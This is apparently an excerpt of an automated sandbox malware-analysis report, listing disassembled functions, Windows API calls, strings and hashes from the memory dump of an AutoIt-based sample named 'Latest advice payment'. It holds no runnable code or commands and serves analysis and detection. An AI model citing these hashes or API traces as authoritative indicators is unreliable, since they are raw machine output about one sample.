                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: 0a217d45d1b4e04383c5c84e0032afb7b66a913ce5da93eea1c45ff58b1857e3
                                                            • Instruction ID: b88bf269704f2c12bf43f85f785c97244eef400c2319f96f4dc832d08f16a656
                                                            • Opcode Fuzzy Hash: 0a217d45d1b4e04383c5c84e0032afb7b66a913ce5da93eea1c45ff58b1857e3
                                                            • Instruction Fuzzy Hash: 2F41B332A002027EDB14BA749C5BEBF7FACFF81710F044469FD05B6182EA349A019BA5
                                                            Function 005627D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005628BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 005628C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005628EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 005628F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 0056291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00562939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00562949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0056297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00562990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 005629AE
                                                            • GetStockObject.GDI32(00000011), ref: 005629CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 005629D5
                                                              • Part of subcall function 00562344: GetCursorPos.USER32(?), ref: 00562357
                                                              • Part of subcall function 00562344: ScreenToClient.USER32(006257B0,?), ref: 00562374
                                                              • Part of subcall function 00562344: GetAsyncKeyState.USER32(00000001), ref: 00562399
                                                              • Part of subcall function 00562344: GetAsyncKeyState.USER32(00000002), ref: 005623A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00561256), ref: 005629FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: 81e5328c59ac30166918b43a352f54fc844c8af19887a11f6b55914df356a180
                                                            • Instruction ID: 3c87a39c2e30445d20c9980e7fe4811c3af8bd17de3da049904469acf259c0c6
                                                            • Opcode Fuzzy Hash: 81e5328c59ac30166918b43a352f54fc844c8af19887a11f6b55914df356a180
                                                            • Instruction Fuzzy Hash: 1FB18E71A0060ADFDF24DFA8DC89BAD7FB5FB58310F104229FA56AB290DB749841DB50
                                                            Function 005BA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 005BA47A
                                                            • __swprintf.LIBCMT ref: 005BA51B
                                                            • _wcscmp.LIBCMT ref: 005BA52E
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005BA583
                                                            • _wcscmp.LIBCMT ref: 005BA5BF
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 005BA5F6
                                                            • GetDlgCtrlID.USER32(?), ref: 005BA648
                                                            • GetWindowRect.USER32(?,?), ref: 005BA67E
                                                            • GetParent.USER32(?), ref: 005BA69C
                                                            • ScreenToClient.USER32(00000000), ref: 005BA6A3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 005BA71D
                                                            • _wcscmp.LIBCMT ref: 005BA731
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 005BA757
                                                            • _wcscmp.LIBCMT ref: 005BA76B
                                                              • Part of subcall function 0058362C: _iswctype.LIBCMT ref: 00583634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 556b8c1106ec40cd6cac37d2da796b1b54b53b54c08844388699dca691290d06
                                                            • Instruction ID: a86825fd46e02b398c3749bed814e39287e2911f6ee118131a03cec6e805e648
                                                            • Opcode Fuzzy Hash: 556b8c1106ec40cd6cac37d2da796b1b54b53b54c08844388699dca691290d06
                                                            • Instruction Fuzzy Hash: 4BA1B371204606AFDB19DF64C888FEABBE8FF44354F008529F999D6190DB30F955CB92
                                                            Function 005BAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 005BAF18
                                                            • _wcscmp.LIBCMT ref: 005BAF29
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 005BAF51
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 005BAF6E
                                                            • _wcscmp.LIBCMT ref: 005BAF8C
                                                            • _wcsstr.LIBCMT ref: 005BAF9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 005BAFD5
                                                            • _wcscmp.LIBCMT ref: 005BAFE5
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 005BB00C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 005BB055
                                                            • _wcscmp.LIBCMT ref: 005BB065
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 005BB08D
                                                            • GetWindowRect.USER32(00000004,?), ref: 005BB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: 4aa4d7ad70953f8dea7be44f38ee3d592964130c7b8306c4de12f95f4c2ecfe8
                                                            • Instruction ID: c19c6362cae3721aad642f87aabb8d5fe0a8f99873106d706873a42e9d8061a1
                                                            • Opcode Fuzzy Hash: 4aa4d7ad70953f8dea7be44f38ee3d592964130c7b8306c4de12f95f4c2ecfe8
                                                            • Instruction Fuzzy Hash: 31819E7110820A9BEB05DF14C889BFA7FE8FF94714F048469FD859A091DBB4EE49CB61
                                                            Function 005EC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 005EC627
                                                              • Part of subcall function 005EAB37: ClientToScreen.USER32(?,?), ref: 005EAB60
                                                              • Part of subcall function 005EAB37: GetWindowRect.USER32(?,?), ref: 005EABD6
                                                              • Part of subcall function 005EAB37: PtInRect.USER32(?,?,005EC014), ref: 005EABE6
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 005EC690
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005EC69B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005EC6BE
                                                            • _wcscat.LIBCMT ref: 005EC6EE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 005EC705
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 005EC71E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 005EC735
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 005EC757
                                                            • DragFinish.SHELL32(?), ref: 005EC75E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005EC851
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbb
                                                            • API String ID: 169749273-982995565
                                                            • Opcode ID: 3b22a62533faee9dab85cc45a1d9f104259e7b60c84ae39b371ad319f180e7f0
                                                            • Instruction ID: f0cac0fec313a2d29174b57312a823112da74501c96993a0ff8375e3e30fd039
                                                            • Opcode Fuzzy Hash: 3b22a62533faee9dab85cc45a1d9f104259e7b60c84ae39b371ad319f180e7f0
                                                            • Instruction Fuzzy Hash: 36616871108381AFC705EF64D889DAFBFE9FB99350F00092EF591971A1DB709A49CB52
                                                            Function 005BABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: b2b5c8169946bf5da8fc5f0b23599656d1b10010468ff958a4db7af56c204f5f
                                                            • Instruction ID: ed7001805294d052a094006b9727b4df704b92ac6ae9eded84535733ee705c07
                                                            • Opcode Fuzzy Hash: b2b5c8169946bf5da8fc5f0b23599656d1b10010468ff958a4db7af56c204f5f
                                                            • Instruction Fuzzy Hash: 45316F3198820AAADB14FA60DD0BEEE7F75BF50710F640519B841720E1FF617F44C656
                                                            Function 005D4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 005D5013
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 005D501E
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 005D5029
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 005D5034
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 005D503F
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 005D504A
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 005D5055
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 005D5060
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 005D506B
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 005D5076
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 005D5081
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 005D508C
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 005D5097
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 005D50A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 005D50AD
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 005D50B8
                                                            • GetCursorInfo.USER32(?), ref: 005D50C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
                                                            • Opcode ID: aac8ffe961fdf2373e410d5477889524c1e39757d412fdfcf1e2c05deaec3f5e
                                                            • Instruction ID: 7d3fc78d786ccf5c2203859b28298b46e424bd7775dd4bb9549b89004579c73f
                                                            • Opcode Fuzzy Hash: aac8ffe961fdf2373e410d5477889524c1e39757d412fdfcf1e2c05deaec3f5e
                                                            • Instruction Fuzzy Hash: 1531D6B1D483196ADF209FBA8C8995EBFE8FF04750F50453BA54DE7280DA786504CF91
                                                            Function 005EA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005EA259
                                                            • DestroyWindow.USER32(?,?), ref: 005EA2D3
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 005EA34D
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005EA36F
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005EA382
                                                            • DestroyWindow.USER32(00000000), ref: 005EA3A4
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00560000,00000000), ref: 005EA3DB
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005EA3F4
                                                            • GetDesktopWindow.USER32 ref: 005EA40D
                                                            • GetWindowRect.USER32(00000000), ref: 005EA414
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005EA42C
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 005EA444
                                                              • Part of subcall function 005625DB: GetWindowLongW.USER32(?,000000EB), ref: 005625EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: dc8971f383f932cda47b462b498ba6ed433be08d8f89cb10895b0c6b54099258
                                                            • Instruction ID: 3d770e734a2af088339a363dd5918c5624affb4370a3a0f991bf6a2e86548459
                                                            • Opcode Fuzzy Hash: dc8971f383f932cda47b462b498ba6ed433be08d8f89cb10895b0c6b54099258
                                                            • Instruction Fuzzy Hash: 2F719070140685AFDB29DF28CC49F667BE6FB88304F04491DF9C59B2A0DBB4E906DB52
                                                            Function 005E4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 005E4424
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005E446F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 4c18794cc8296e35d233a98f70507bf7fb60bbd723b73d251e4845b00d9414b9
                                                            • Instruction ID: 6cb94603109e5edcce54cfcf4ff41b124b26d3436dbd17fa1709a48d155571a0
                                                            • Opcode Fuzzy Hash: 4c18794cc8296e35d233a98f70507bf7fb60bbd723b73d251e4845b00d9414b9
                                                            • Instruction Fuzzy Hash: D5914C752043429BCB08EF11C455A6EBFE5BF95350F144868F8D65B3A2CB31ED49CB91
                                                            Function 005EB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005EB8B4
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005E91C2), ref: 005EB910
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005EB949
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005EB98C
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005EB9C3
                                                            • FreeLibrary.KERNEL32(?), ref: 005EB9CF
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005EB9DF
                                                            • DestroyIcon.USER32(?,?,?,?,?,005E91C2), ref: 005EB9EE
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005EBA0B
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005EBA17
                                                              • Part of subcall function 00582EFD: __wcsicmp_l.LIBCMT ref: 00582F86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: f5a0f41a99a92334f01324b9faa75436abf1f2779c46d76702f6482a813d4682
                                                            • Instruction ID: a58cdf4fe31bc521c8f09d256945e67135c6ad8fc24a8b8af3cc6744fd836d73
                                                            • Opcode Fuzzy Hash: f5a0f41a99a92334f01324b9faa75436abf1f2779c46d76702f6482a813d4682
                                                            • Instruction Fuzzy Hash: 0D61FD71900259BAEB18DF65CC85BBB7FACFB08712F104115FE51EA1C1DB74AA80DBA0
                                                            Function 005CDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 005CDCDC
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 005CDCEC
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005CDCF8
                                                            • __wsplitpath.LIBCMT ref: 005CDD56
                                                            • _wcscat.LIBCMT ref: 005CDD6E
                                                            • _wcscat.LIBCMT ref: 005CDD80
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005CDD95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDDA9
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDDDB
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDDFC
                                                            • _wcscpy.LIBCMT ref: 005CDE08
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 005CDE47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 3566783562-438819550
                                                            • Opcode ID: b609284cd5109a179184ada199ea795935298917e082c1f0db5f1f3d39cc883c
                                                            • Instruction ID: 3952f049cedc7edfd8d275225735f96aeee04320d579839b6484f32fa5807105
                                                            • Opcode Fuzzy Hash: b609284cd5109a179184ada199ea795935298917e082c1f0db5f1f3d39cc883c
                                                            • Instruction Fuzzy Hash: 14613A765042469FCB10EF60C849EAABBE8FF89314F04492DF989D7251DB31E945CBA2
                                                            Function 005CA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • CharLowerBuffW.USER32(?,?), ref: 005CA3CB
                                                            • GetDriveTypeW.KERNEL32 ref: 005CA418
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CA460
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CA497
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CA4C5
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 88996b62895472d5e3fc06fe30f75639a6ed2e851fdb046bbe3edd90bea5bd5c
                                                            • Instruction ID: 1cc82b2d9bf75465b4b8c59e7e37c84ecadfae0b503f1535d28fc669cfedc151
                                                            • Opcode Fuzzy Hash: 88996b62895472d5e3fc06fe30f75639a6ed2e851fdb046bbe3edd90bea5bd5c
                                                            • Instruction Fuzzy Hash: C2517E7510430A9FC704EF20C885D6ABBE9FF98718F04896DF896572A1DB31ED09CB82
                                                            Function 005BF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0059E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 005BF8DF
                                                            • LoadStringW.USER32(00000000,?,0059E029,00000001), ref: 005BF8E8
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0059E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 005BF90A
                                                            • LoadStringW.USER32(00000000,?,0059E029,00000001), ref: 005BF90D
                                                            • __swprintf.LIBCMT ref: 005BF95D
                                                            • __swprintf.LIBCMT ref: 005BF96E
                                                            • _wprintf.LIBCMT ref: 005BFA17
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005BFA2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
